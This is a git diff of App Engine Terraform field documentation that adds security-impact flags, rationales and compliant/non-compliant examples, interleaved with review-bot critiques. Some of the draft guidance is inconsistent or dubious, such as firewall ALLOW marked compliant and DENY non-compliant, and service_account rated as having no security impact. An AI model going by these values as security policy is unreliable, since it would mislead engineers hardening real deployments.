@@ -14,37 +14,37 @@ "domain": { "description": "Domain name to match against. The wildcard \"*\" is supported if specified before a period: \"*.\". Defaults to matching all domains: \"*\".", "required": false, - "security_impact": null, - "rationale": null, - "compliant": null, - "non-compliant": null, + "security_impact": true, + "rationale": "To enforce strict hostname mapping to ensure traffic is only routed through approved domains, preventing 'Host Header Injection' and ensuring cross-site requests are properly isolated.", + "compliant": "hardhat.pythonanywhere.com", + "non-compliant": "invalid-domain.com", "parent": "dispatch_rules" }, "path": { "description": "Pathname within the host. Must start with a \"/\". A single \"*\" can be included at the end of the path. The sum of the lengths of the domain and path may not exceed 100 characters.", "required": true, - "security_impact": null, - "rationale": null, - "compliant": null, - "non-compliant": null, + "security_impact": true, + "rationale": "To define explicit URL patterns to ensure sensitive application paths are strictly mapped to their intended microservices, preventing accidental exposure of internal endpoints", + "compliant": "/*", + "non-compliant": "admin/*", "parent": "dispatch_rules" }, "service": { "description": "Pathname within the host. Must start with a \"/\". A single \"*\" can be included at the end of the path. 
The sum of the lengths of the domain and path may not exceed 100 characters.", "required": true, - "security_impact": null, - "rationale": null, - "compliant": null, - "non-compliant": null, + "security_impact": true, + "rationale": "To enforce explicit mapping of URL patterns to specific microservices to ensure architectural isolation and prevent traffic from falling back to a service that may not have the appropriate security context/permissions", + "compliant": "default", + "non-compliant": "unauthorized-service", "parent": "dispatch_rules" } } }, "project": { "description": "If it is not provided, the provider project is used.", - "required": null, - "security_impact": null, - "rationale": null, + "required": false, + "security_impact": false, + "rationale": "Unnecessary as it defaults to the provider-level project configuration if it is not provided, ensuring the resource is naturally governed by the existing project-level access controls.", "compliant": null, "non-compliant": null, "parent": null diff --git a/docs/gcp/App_Engine/resource_json/app_engine_domain_mapping.json b/docs/gcp/App_Engine/resource_json/app_engine_domain_mapping.json index bbd1fb750..41d797ed7 100644 --- a/docs/gcp/App_Engine/resource_json/app_engine_domain_mapping.json +++ b/docs/gcp/App_Engine/resource_json/app_engine_domain_mapping.json 
@@ -5,17 +5,17 @@ "domain_name": { "description": "Relative name of the domain serving the application. Example: example.com.", "required": true, - "security_impact": null, - "rationale": null, - "compliant": null, - "non-compliant": null, + "security_impact": true, + "rationale": "To enforce the use of verified domains to prevent unauthorized shadow branding and ensure all application traffic is protected by corporate-standard SSL/TLS configurations", + "compliant": "hardhatenterprises.com", + "non-compliant": "unverified-domain.com", "parent": null }, "ssl_settings": { "description": "SSL configuration for this domain. If unconfigured, this domain will not serve with SSL. Structure is [documented below](#nested_ssl_settings).", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": true, + "rationale": "Mandates the use of managed SSL settings to guarantee that all custom domain traffic is encrypted via TLS and to eliminate the risk of service downtime caused by expired manual certificates", "compliant": null, "non-compliant": null, "parent": null, @@ -23,8 +23,8 @@ "certificate_id": { "description": "ID of the AuthorizedCertificate resource configuring SSL for the application. Clearing this field will remove SSL support. By default, a managed certificate is automatically created for every domain mapping. To omit SSL support or to configure SSL manually, specify `SslManagementType.MANUAL` on a `CREATE` or `UPDATE` request. You must be authorized to administer the `AuthorizedCertificate` resource to manually map it to a DomainMapping resource. Example: 12345.", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "Mandating/managing specific certificate IDs manually increases operational overhead and introduces the risk of service outages due to manual renewal failures.", "compliant": null, "non-compliant": null, "parent": "ssl_settings" 
@@ -32,17 +32,17 @@ "ssl_management_type": { "description": "SSL management type for this domain. If `AUTOMATIC`, a managed certificate is automatically provisioned. If `MANUAL`, `certificateId` must be manually specified in order to configure SSL for this domain. Possible values are: `AUTOMATIC`, `MANUAL`.", "required": true, - "security_impact": null, - "rationale": null, - "compliant": null, - "non-compliant": null, + "security_impact": true, + "rationale": "Mandates 'AUTOMATIC' SSL management to utilise Google's managed certificate authority, ensuring renewals and the use of modern cryptographic protocols without human intervention.", + "compliant": "AUTOMATIC", + "non-compliant": "MANUAL", "parent": "ssl_settings" }, "pending_managed_certificate_id": { "description": "(Output) ID of the managed `AuthorizedCertificate` resource currently being provisioned, if applicable. Until the new managed certificate has been successfully provisioned, the previous SSL state will be preserved. Once the provisioning process completes, the `certificateId` field will reflect the new managed certificate and this field will be left empty. To remove SSL support while there is still a pending managed certificate, clear the `certificateId` field with an update request.", "required": null, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "Is a read-only output attribute managed by Google Cloud, represents a transient state during certificate provisioning and cannot be influenced/configured by the user.", "compliant": null, "non-compliant": null, "parent": "ssl_settings" 
@@ -52,17 +52,17 @@ "override_strategy": { "description": "Whether the domain creation should override any existing mappings for this domain. By default, overrides are rejected. Default value is `STRICT`. Possible values are: `STRICT`, `OVERRIDE`.", "required": false, - "security_impact": null, - "rationale": null, - "compliant": null, - "non-compliant": null, + "security_impact": true, + "rationale": "to enforce a clear resolution strategy for domain mapping conflicts to prevent accidental hijacking of custom domains from other projects and ensure predictable routing behavior.", + "compliant": "STRICT", + "non-compliant": "OVERRIDE", "parent": null }, "project": { "description": "If it is not provided, the provider project is used.", - "required": null, - "security_impact": null, - "rationale": null, + "required": false, + "security_impact": false, + "rationale": "It is a standard provider-inherited field as the resource is inherently constrained by the project-level permissions and deployment context of the authenticated service account.", "compliant": null, "non-compliant": null, "parent": null diff --git a/docs/gcp/App_Engine/resource_json/app_engine_firewall_rule.json b/docs/gcp/App_Engine/resource_json/app_engine_firewall_rule.json index 948e356a8..d27a50455 100644 --- a/docs/gcp/App_Engine/resource_json/app_engine_firewall_rule.json +++ b/docs/gcp/App_Engine/resource_json/app_engine_firewall_rule.json 
@@ -5,26 +5,26 @@ "source_range": { "description": "IP address or range, defined using CIDR notation, of requests that this rule applies to.", "required": true, - "security_impact": null, - "rationale": null, - "compliant": null, - "non-compliant": null, + "security_impact": true, + "rationale": "Enforces strict IP CIDR boundaries to minimize the application's attack surface by ensuring only trusted networks or specific geographic IP ranges can interact with the App Engine environment.", + "compliant": "192.168.1.0/24", + "non-compliant": "*", "parent": null }, "action": { "description": "The action to take if this rule matches. Possible values are: `UNSPECIFIED_ACTION`, `ALLOW`, `DENY`.", "required": true, - "security_impact": null, - "rationale": null, - "compliant": null, - "non-compliant": null, + "security_impact": true, + "rationale": "Is the explicit binary outcome for a network request, ensuring that the firewall behaves as a definitive gatekeeper rather than allowing traffic to pass through ambiguity.", + "compliant": "ALLOW", + "non-compliant": "DENY", "parent": null }, "description": { "description": "An optional string description of this rule.", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "Is an informative field that does not influence the network logic/security enforcement of the firewall rule.", "compliant": null, "non-compliant": null, "parent": null 
@@ -32,17 +32,17 @@ "priority": { "description": "A positive integer that defines the order of rule evaluation. Rules with the lowest priority are evaluated first. A default rule at priority Int32.MaxValue matches all IPv4 and IPv6 traffic when no previous rule matches. Only the action of this rule can be modified by the user.", "required": false, - "security_impact": null, - "rationale": null, - "compliant": null, - "non-compliant": null, + "security_impact": true, + "rationale": "Enforces an ordering of firewall rules to ensure that specific security 'Allow' or 'Deny' logic is evaluated in the correct sequence.", + "compliant": "1000", + "non-compliant": "2147483647", "parent": null }, "project": { "description": "If it is not provided, the provider project is used.", - "required": null, - "security_impact": null, - "rationale": null, + "required": false, + "security_impact": false, + "rationale": "Is automatically constrained by the Google provider's project configuration, ensuring that firewall rules are strictly applied to the intended environment without manual entry.", "compliant": null, "non-compliant": null, "parent": null diff --git a/docs/gcp/App_Engine/resource_json/app_engine_flexible_app_version.json b/docs/gcp/App_Engine/resource_json/app_engine_flexible_app_version.json index 168a34b2e..32f80910e 100644 --- a/docs/gcp/App_Engine/resource_json/app_engine_flexible_app_version.json +++ b/docs/gcp/App_Engine/resource_json/app_engine_flexible_app_version.json 
@@ -5,17 +5,17 @@ "runtime": { "description": "Desired runtime. Example python27.", "required": true, - "security_impact": null, - "rationale": null, - "compliant": null, - "non-compliant": null, + "security_impact": true, + "rationale": "To ensure the application environment is patched against known vulnerabilities and remains compatible with organizational security tooling.", + "compliant": "nodejs", + "non-compliant": "python27", "parent": null }, "readiness_check": { "description": "Configures readiness health checking for instances. Unhealthy instances are not put into the backend traffic rotation. Structure is [documented below](#nested_readiness_check).", "required": true, - "security_impact": null, - "rationale": null, + "security_impact": true, + "rationale": "Mandates the configuration of health probes to ensure that the load balancer only routes traffic to fully initialized and healthy instances which prevents errors and ensures correct deployments.", "compliant": null, "non-compliant": null, "parent": null, 
@@ -23,17 +23,17 @@ "path": { "description": "The request path.", "required": true, - "security_impact": null, - "rationale": null, - "compliant": null, - "non-compliant": null, + "security_impact": true, + "rationale": "to enforce a specific dedicated health endpoint to ensure the load balancer validates the actual readiness of the application logic rather than just the availability of the web server/static landing page.", + "compliant": "/", + "non-compliant": "/invalid-path", "parent": "readiness_check" }, "host": { "description": "Host header to send when performing a HTTP Readiness check. Example: \"myapp.appspot.com\"", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "App Engine routes health checks to the instance's internal IP, defining a host header is unnecessary and can inadvertently bypass internal security controls if misconfigured.", "compliant": null, "non-compliant": null, "parent": "readiness_check" @@ -41,17 +41,17 @@ "failure_threshold": { "description": "Number of consecutive failed checks required before removing traffic. Default: 2.", "required": false, - "security_impact": null, - "rationale": null, - "compliant": null, - "non-compliant": null, + "security_impact": true, + "rationale": "Configures the specific tolerance level for failed health probes to prevent flapping.", + "compliant": "failure_threshold = 4", + "non-compliant": "failure_threshold = 0", "parent": "readiness_check" }, "success_threshold": { "description": "Number of consecutive successful checks required before receiving traffic. Default: 2.", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "Google Cloud default is sufficiently conservative to prevent flapping and ensures an instance is stable before it is reintroduced to the load balancer.", "compliant": null, "non-compliant": null, "parent": "readiness_check" 
@@ -59,8 +59,8 @@ "check_interval": { "description": "Interval between health checks. Default: \"5s\".", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "As Google-managed default provides an optimal balance between rapid failure detection and the reduction of unnecessary noise.", "compliant": null, "non-compliant": null, "parent": "readiness_check" @@ -68,17 +68,17 @@ "timeout": { "description": "Time before the check is considered failed. Default: \"4s\"", "required": false, - "security_impact": null, - "rationale": null, - "compliant": null, - "non-compliant": null, + "security_impact": true, + "rationale": "Enforces a strict upper limit on how long a health probe can wait for a response to ensure that stalled requests are terminated quickly to prevent them from clogging the application's request queue.", + "compliant": "4s", + "non-compliant": "30s", "parent": "readiness_check" }, "app_start_timeout": { "description": "A maximum time limit on application initialization, measured from moment the application successfully replies to a healthcheck until it is ready to serve traffic. Default: \"300s\"", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "Application initialization times vary drastically based on language runtime, dependency loading, and cache warming requirements.", "compliant": null, "non-compliant": null, "parent": "readiness_check" 
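Review bot: The readiness `timeout` examples `4s` (compliant) and `30s` (non-compliant) do not define the bound the policy enforces: `4s` is the default quoted in the description and every value in between is undecided, so state the maximum permitted timeout in the rationale (for example "must not exceed the 4s default") so the check is decidable. The `check_interval` rationale is a fragment ("As Google-managed default provides ..."); drop "As" or finish the clause.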
@@ -88,8 +88,8 @@ "liveness_check": { "description": "Health checking configuration for VM instances. Unhealthy instances are killed and replaced with new instances. Structure is [documented below](#nested_liveness_check).", "required": true, - "security_impact": null, - "rationale": null, + "security_impact": true, + "rationale": "Enforces the configuration of liveness probes to detect deadlocked/zombie processes that are running but no longer functional, allowing the platform to automatically restart the instance and restore service health.", "compliant": null, "non-compliant": null, "parent": null, @@ -97,17 +97,17 @@ "path": { "description": "The request path.", "required": true, - "security_impact": null, - "rationale": null, - "compliant": null, - "non-compliant": null, + "security_impact": true, + "rationale": "To enforce a specific dedicated health endpoint to ensure the load balancer validates the actual readiness of the application logic rather than just the availability of the web server/static landing page.", + "compliant": "/", + "non-compliant": "/invalid-path", "parent": "liveness_check" }, "host": { - "description": "Host header to send when performing a HTTP Readiness check. Example: \"myapp.appspot.com\"", + "description": "Host header to send when performing a HTTP Readiness check. Example: \"myapp.appspot.com\"", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "App Engine routes health checks to the instance's internal IP, defining a host header is unnecessary and can inadvertently bypass internal security controls if misconfigured.", "compliant": null, "non-compliant": null, "parent": "liveness_check" 
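Review bot: The liveness `host` description still says "HTTP Readiness check" after the edit, and the liveness `path` rationale was copied from `readiness_check` ("validates the actual readiness of the application logic"); both sit under `liveness_check`, whose parent rationale in this hunk is about detecting deadlocked processes, so reword them for the liveness case.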
@@ -115,17 +115,17 @@ "failure_threshold": { "description": "Number of consecutive failed checks required before considering the VM unhealthy. Default: 4.", "required": false, - "security_impact": null, - "rationale": null, - "compliant": null, - "non-compliant": null, + "security_impact": true, + "rationale": "Configures the specific tolerance level for failed health probes to prevent flapping.", + "compliant": "failure_threshold = 4", + "non-compliant": "failure_threshold = 0", "parent": "liveness_check" }, "success_threshold": { "description": "Number of consecutive successful checks required before considering the VM healthy. Default: 2.", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "Google Cloud default is sufficiently conservative to prevent flapping and ensures an instance is stable before it is reintroduced to the load balancer.", "compliant": null, "non-compliant": null, "parent": "liveness_check" @@ -133,8 +133,8 @@ "check_interval": { "description": "Interval between health checks.", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "As Google-managed default provides an optimal balance between rapid failure detection and the reduction of unnecessary noise.", "compliant": null, "non-compliant": null, "parent": "liveness_check" 
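Review bot: The liveness `failure_threshold` rationale and examples are duplicated verbatim from `readiness_check` even though the two defaults differ (2 for readiness, 4 for liveness per the descriptions); with `failure_threshold = 4` as the compliant example and `0` as the only non-compliant one, the acceptable range is undefined, so state the minimum the policy requires for each probe type. The `check_interval` rationale fragment ("As Google-managed default ...") is repeated here and needs the same fix as in `readiness_check`.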
@@ -142,17 +142,17 @@ "timeout": { "description": "Time before the check is considered failed. Default: \"4s\"", "required": false, - "security_impact": null, - "rationale": null, - "compliant": null, - "non-compliant": null, + "security_impact": true, + "rationale": "Enforces a strict upper limit on how long a health probe can wait for a response to ensure that stalled requests are terminated quickly to prevent them from clogging the application's request queue.", + "compliant": "4s", + "non-compliant": "30s", "parent": "liveness_check" }, "initial_delay": { "description": "The initial delay before starting to execute the checks. Default: \"300s\"", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "Enforcing a universal delay could lead to premature restarts of slow-starting but healthy applications.", "compliant": null, "non-compliant": null, "parent": "liveness_check" 
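Review bot: The liveness `timeout` rationale ("prevent them from clogging the application's request queue") is copied from the readiness probe, but per the parent description a failed liveness check kills and replaces the instance rather than removing it from rotation; rewrite the rationale around that consequence (a long probe timeout delaying replacement of a dead instance) so the stated impact matches the field.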
@@ -162,17 +162,17 @@ "service": { "description": "AppEngine service resource. Can contain numbers, letters, and hyphens.", "required": true, - "security_impact": null, - "rationale": null, - "compliant": null, - "non-compliant": null, + "security_impact": true, + "rationale": "Enforces explicit service naming to ensure that application components are logically isolated, preventing accidental resource overwrites.", + "compliant": "default", + "non-compliant": "unauthorized-app", "parent": null }, "version_id": { "description": "Relative name of the version within the service. For example, `v1`. Version names can contain only lowercase letters, numbers, or hyphens. Reserved names,\"default\", \"latest\", and any name with the prefix \"ah-\".", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "to allow CI/CD pipelines to dynamically generate unique identifiers, which is essential for maintaining an immutable audit trail and enabling safe rollbacks.", "compliant": null, "non-compliant": null, "parent": null @@ -180,8 +180,8 @@ "inbound_services": { "description": "A list of the types of messages that this application is able to receive. Each value may be one of: `INBOUND_SERVICE_MAIL`, `INBOUND_SERVICE_MAIL_BOUNCE`, `INBOUND_SERVICE_XMPP_ERROR`, `INBOUND_SERVICE_XMPP_MESSAGE`, `INBOUND_SERVICE_XMPP_SUBSCRIBE`, `INBOUND_SERVICE_XMPP_PRESENCE`, `INBOUND_SERVICE_CHANNEL_PRESENCE`, `INBOUND_SERVICE_WARMUP`.", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "As primarily used to enable legacy App Engine services which are largely deprecated/irrelevant in the Flexible Environment, security for incoming traffic is instead governed by modern network and firewall policies.", "compliant": null, "non-compliant": null, "parent": null 
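Review bot: The `service` example pair (`default` vs `unauthorized-app`) does not express a checkable rule: both values satisfy the description's character constraints, and `default` is the implicit service name, which sits oddly with a rationale about "explicit service naming"; state the naming convention the policy enforces and choose examples that differ on it. The `version_id` rationale starts lowercase ("to allow") and the `inbound_services` rationale is a fragment ("As primarily used to ..."); fix both.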
@@ -189,8 +189,8 @@ "instance_class": { "description": "Instance class that is used to run this version. Valid values are AutomaticScaling: F1, F2, F4, F4_1G ManualScaling: B1, B2, B4, B8, B4_1G Defaults to F1 for AutomaticScaling and B1 for ManualScaling.", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "It is a legacy parameter exclusive to the App Engine Standard environment.", "compliant": null, "non-compliant": null, "parent": null @@ -198,8 +198,8 @@ "network": { "description": "Extra network settings Structure is [documented below](#nested_network).", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "App Engine Flexible automatically defaults to the 'default' VPC with managed settings and primary network security is better governed at the VPC and Firewall levels rather than through individual resource declarations.", "compliant": null, "non-compliant": null, "parent": null, @@ -263,8 +263,8 @@ "resources": { "description": "Machine resources for a version. Structure is [documented below](#nested_resources).", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "The hardware requirements are tied to the specific application's performance profile, imposing constraints would prevent right-sizing and could lead to resource starvation/unnecessary cloud spend.", "compliant": null, "non-compliant": null, "parent": null, 
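Review bot: The `network` rationale argues that "primary network security is better governed at the VPC and Firewall levels", yet this block is where the version's VPC settings are declared (the rationale itself notes the fallback to the `default` VPC), so that argument supports giving the block security impact rather than denying it; either set `security_impact` to true with an example pair, or reword the rationale to say why the block's contents are out of scope. The `resources` rationale is a comma splice ("... performance profile, imposing constraints ..."); split it into two sentences.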
@@ -310,8 +310,8 @@ "runtime_channel": { "description": "The channel of the runtime to use. Only available for some runtimes.", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "The platform defaults to the stable channel which ensures that applications run on production-ready environment binaries without requiring manual intervention or the risk of using experimental preview features.", "compliant": null, "non-compliant": null, "parent": null @@ -319,8 +319,8 @@ "flexible_runtime_settings": { "description": "Runtime settings for App Engine flexible environment. Structure is [documented below](#nested_flexible_runtime_settings).", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "The settings are highly specific to individual language runtimes and typically govern performance tuning/debugging than compliance boundaries.", "compliant": null, "non-compliant": null, "parent": null, @@ -348,8 +348,8 @@ "beta_settings": { "description": "Metadata settings that are supplied to this version to enable beta runtime features.", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "Parameters are intended for temporary experimental features that are not yet part of the stable API.", "compliant": null, "non-compliant": null, "parent": null 
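Review bot: The `beta_settings` rationale ("intended for temporary experimental features that are not yet part of the stable API") describes a risk, and the `runtime_channel` rationale in the same line warns against "experimental preview features", so marking `beta_settings` as `security_impact: false` is inconsistent with both; consider `true` with an empty map as compliant and any populated map as non-compliant, or explain why experimental features are acceptable here. Grammar: the `flexible_runtime_settings` rationale needs "rather than compliance boundaries".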
@@ -357,8 +357,8 @@ "serving_status": { "description": "Current serving status of this version. Only the versions with a SERVING status create instances and can be billed. Default value is `SERVING`. Possible values are: `SERVING`, `STOPPED`.", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "As it governs the operational state of a version which must remain dynamic to allow automated deployments, traffic splitting and manual emergency interventions without triggering policy violations.", "compliant": null, "non-compliant": null, "parent": null @@ -366,8 +366,8 @@ "runtime_api_version": { "description": "The version of the API in the given runtime environment. Please see the app.yaml reference for valid values at `https://cloud.google.com/appengine/docs/standard//config/appref`\\ Substitute `` with `python`, `java`, `php`, `ruby`, `go` or `nodejs`.", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "As managed internally by the selected runtime, enforcing a specific API version at the policy level would create unnecessary coupling between infrastructure code and language-specific internals.", "compliant": null, "non-compliant": null, "parent": null @@ -375,8 +375,8 @@ "handlers": { "description": "An ordered list of URL-matching patterns that should be applied to incoming requests. The first matching URL handles the request and other request handlers are not attempted. Structure is [documented below](#nested_handlers).", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "Flexible Environment is container-based where routing and static file handling are managed internally by the application's web server.", "compliant": null, "non-compliant": null, "parent": null, 
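Review bot: The `handlers` rationale ("routing and static file handling are managed internally by the application's web server") overlooks that the nested `handlers` structure the description points to is where per-URL settings live in the provider schema, including whether a URL may be served over plain HTTP; if those settings are intentionally out of scope, say so in the rationale, otherwise set `security_impact` to true. Unchanged context, but worth a follow-up: the `runtime_api_version` description carries a broken doc URL (`standard//config/appref`) and an empty placeholder in "Substitute `` with".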
@@ -449,8 +449,8 @@ "runtime_main_executable_path": { "description": "The path or name of the app's main executable.", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "Within a containerized Flexible environment the execution logic is better governed by the entrypoint or the container's internal configuration and enforcing a path would break standard deployment conventions for multi-language microservices.", "compliant": null, "non-compliant": null, "parent": null @@ -458,8 +458,8 @@ "service_account": { "description": "The identity that the deployed version will run as. Admin API will use the App Engine Appspot service account as default if this field is neither provided in app.yaml file nor through CLI flag.", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "To allow developers to assign unique least-privileged identities to each microservice", "compliant": null, "non-compliant": null, "parent": null @@ -467,8 +467,8 @@ "api_config": { "description": "Serving configuration for Google Cloud Endpoints. Structure is [documented below](#nested_api_config).", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "Is a legacy configuration for Google Cloud Endpoints Frameworks, this block would not be utilised.", "compliant": null, "non-compliant": null, "parent": null, @@ -523,8 +523,8 @@ "env_variables": { "description": "Environment variables available to the application. As these are not returned in the API request, Terraform will not detect any changes made outside of the Terraform config.", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "Intrinsic to the application's runtime logic.", "compliant": null, "non-compliant": null, "parent": null 
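Review bot: The `service_account` entry is internally contradictory: the rationale invokes least-privileged identities, but `security_impact: false` with a null example pair means the policy never checks the field, while the description says an unset value falls back to the App Engine Appspot service account, which is the opposite of least privilege; set `security_impact` to true with an explicitly assigned service account as compliant and "unset (default Appspot account)" as non-compliant. Style: the `api_config` rationale ("Is a legacy configuration ...") needs a subject, and the `env_variables` rationale ("Intrinsic to the application's runtime logic.") is a fragment.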
@@ -532,8 +532,8 @@ "default_expiration": { "description": "Duration that static files should be cached by web proxies and browsers. Only applicable if the corresponding StaticFilesHandler does not specify its own expiration time.", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "Cache-control requirements are dictated by the specific nature of the application's static assets.", "compliant": null, "non-compliant": null, "parent": null @@ -541,8 +541,8 @@ "nobuild_files_regex": { "description": "Files that match this pattern will not be built into this version. Only applicable for Go runtimes.", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "File exclusion is more effectively managed via standardized version control ignore files and container-specific exclusion files.", "compliant": null, "non-compliant": null, "parent": null @@ -550,8 +550,8 @@ "deployment": { "description": "Code and application artifacts that make up this version. Structure is [documented below](#nested_deployment).", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": true, + "rationale": "Is enforced to ensure that every application version is derived from a verified immutable source (such as a specific container image or source code hash).", "compliant": null, "non-compliant": null, "parent": null, @@ -559,8 +559,8 @@ "zip": { "description": "Zip File Structure is [documented below](#nested_deployment_zip).", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": true, + "rationale": "Ensure that source-based deployments utilize versioned objects stored in Google Cloud Storage", "compliant": null, "non-compliant": null, "parent": "deployment" 
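Review bot: The `deployment` hunk sets `security_impact: true` with a rationale about a "verified immutable source (such as a specific container image or source code hash)" but leaves both examples null, so the policy never says what passes; give the pair the rationale already implies (an image reference pinned by digest as compliant, a mutable tag as non-compliant). The nested `zip` rationale lacks a terminating period, unlike its neighbours.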
@@ -568,8 +568,8 @@ "files": { "description": "Manifest of the files stored in Google Cloud Storage that are included as part of this version. All files must be readable using the credentials supplied with this call. Structure is [documented below](#nested_deployment_files).", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "individual file-level declarations are redundant when deploying via comprehensive archives or Container Images", "compliant": null, "non-compliant": null, "parent": "deployment" @@ -577,8 +577,8 @@ "container": { "description": "The Docker image for the container that runs the version. Structure is [documented below](#nested_deployment_container).", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "To prevent configuration overlap, as in workflows where source code is the primary artifact the platform automatically generates the container via Cloud Build.", "compliant": null, "non-compliant": null, "parent": "deployment" @@ -586,8 +586,8 @@ "cloud_build_options": { "description": "Options for the build operations performed as a part of the version deployment. Only applicable when creating a version using source code directly. Structure is [documented below](#nested_deployment_cloud_build_options).", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "Build-time configuration is an operational concern distinct from the application's runtime security posture.", "compliant": null, "non-compliant": null, "parent": "deployment" 
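Review bot: The `container` rationale conflicts with its parent: `deployment` is enforced to require "a specific container image", yet `container`, the field that carries that image reference, is marked `security_impact: false` on the grounds that source-based workflows generate the image automatically; if the parent rule is real, `container` is where the digest-versus-tag check has to land. The `cloud_build_options` rationale ("Build-time configuration is an operational concern distinct from the application's runtime security posture") should at least acknowledge that build configuration is part of the same supply chain the `deployment` rationale wants verified.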
@@ -597,8 +597,8 @@ "endpoints_api_service": { "description": "Code and application artifacts that make up this version. Structure is [documented below](#nested_endpoints_api_service).", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "API management via Cloud Endpoints is a separate service layer with its own lifecycle.", "compliant": null, "non-compliant": null, "parent": null, @@ -644,8 +644,8 @@ "entrypoint": { "description": "The entrypoint for the application. Structure is [documented below](#nested_entrypoint).", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": true, + "rationale": "Enforced to ensure that the application starts using a predefined command-string that adheres to organizational standards", "compliant": null, "non-compliant": null, "parent": null, @@ -653,10 +653,10 @@ "shell": { "description": "The format should be a shell command that can be fed to bash -c.", "required": true, - "security_impact": null, - "rationale": null, - "compliant": null, - "non-compliant": null, + "security_impact": true, + "rationale": "Enforced to restrict/standardize the scripts executed during the deployment phase", + "compliant": "node ./app.js", + "non-compliant": "sudo node ./app.js", "parent": "entrypoint" } } @@ -664,8 +664,8 @@ "vpc_access_connector": { "description": "Enables VPC connectivity for standard apps. Structure is [documented below](#nested_vpc_access_connector).", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "To allow for architectural flexibility, while Serverless VPC Access is required for internal-only communication, as not all workloads require connectivity to VPC-hosted resources.", "compliant": null, "non-compliant": null, "parent": null, 
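Review bot: The entrypoint `shell` example pair (`node ./app.js` vs `sudo node ./app.js`) implies a rule, no privilege escalation in the entrypoint, that the rationale never states; write the rule out, since a single example cannot define the check. The rationale also says the scripts run "during the deployment phase", but the entrypoint is the command that starts the serving process, so reword. The `vpc_access_connector` rationale is garbled ("To allow for architectural flexibility, while ... is required ..., as not all workloads ..."); rewrite it as one clear sentence.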
@@ -684,8 +684,8 @@ "automatic_scaling": { "description": "Automatic scaling is based on request rate, response latencies, and other application metrics. Structure is [documented below](#nested_automatic_scaling).", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": true, + "rationale": "Enforced to ensure that every service can respond to traffic fluctuations while maintaining strict guardrails on resource consumption.", "compliant": null, "non-compliant": null, "parent": null, @@ -693,8 +693,8 @@ "cool_down_period": { "description": "The time period that the Autoscaler should wait before it starts collecting information from a new instance. This prevents the autoscaler from collecting information when the instance is initializing, during which the collected usage would not be reliable. Default: 120s", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "Prevents the App Engine autoscaler from reacting to sudden traffic spikes as new instances are ignored until the period ends.", "compliant": null, "non-compliant": null, "parent": "automatic_scaling" 
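Review bot: The `cool_down_period` rationale ("Prevents the App Engine autoscaler from reacting to sudden traffic spikes as new instances are ignored until the period ends") describes a side effect of the field rather than why it has no security impact; reword it to give the reason for `false` (for example that the documented 120s default suits most workloads). The parent `automatic_scaling` hunk is marked `true` with null examples, so its check condition should be stated as well.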
@@ -702,17 +702,17 @@ "cpu_utilization": { "description": "Target scaling by CPU usage. Structure is [documented below](#nested_automatic_scaling_cpu_utilization).", "required": true, - "security_impact": null, - "rationale": null, - "compliant": null, - "non-compliant": null, + "security_impact": true, + "rationale": "Enforced to establish a standardized trigger for horizontal scaling, which ensures that the system proactively adds capacity before CPU saturation leads to increased request latency/service instability", + "compliant": "target_utilization = 0.5", + "non-compliant": "target_utilization = 0.9", "parent": "automatic_scaling" }, "max_concurrent_requests": { "description": "Number of concurrent requests an automatic scaling instance can accept before the scheduler spawns a new instance. Defaults to a runtime-specific value.", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "Can lead to under-utilisation and higher costs by triggering the creation of new instances before the existing ones are actually CPU/memory constrained.", "compliant": null, "non-compliant": null, "parent": "automatic_scaling" @@ -720,8 +720,8 @@ "max_idle_instances": { "description": "Maximum number of idle instances that should be maintained for this version.", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "Autoscaler manages idle instances automatically by default, also manually capping too low can cause performance degradation during volatile traffic spikes.", "compliant": null, "non-compliant": null, "parent": "automatic_scaling" 
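Review bot: The `cpu_utilization` examples `target_utilization = 0.5` and `target_utilization = 0.9` leave the permitted range undefined (anything between them is undecided); state the threshold the policy enforces in the rationale. The `max_concurrent_requests` rationale ("Can lead to under-utilisation and higher costs ...") explains a downside of setting the field, not why it has no security impact; say which it is.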
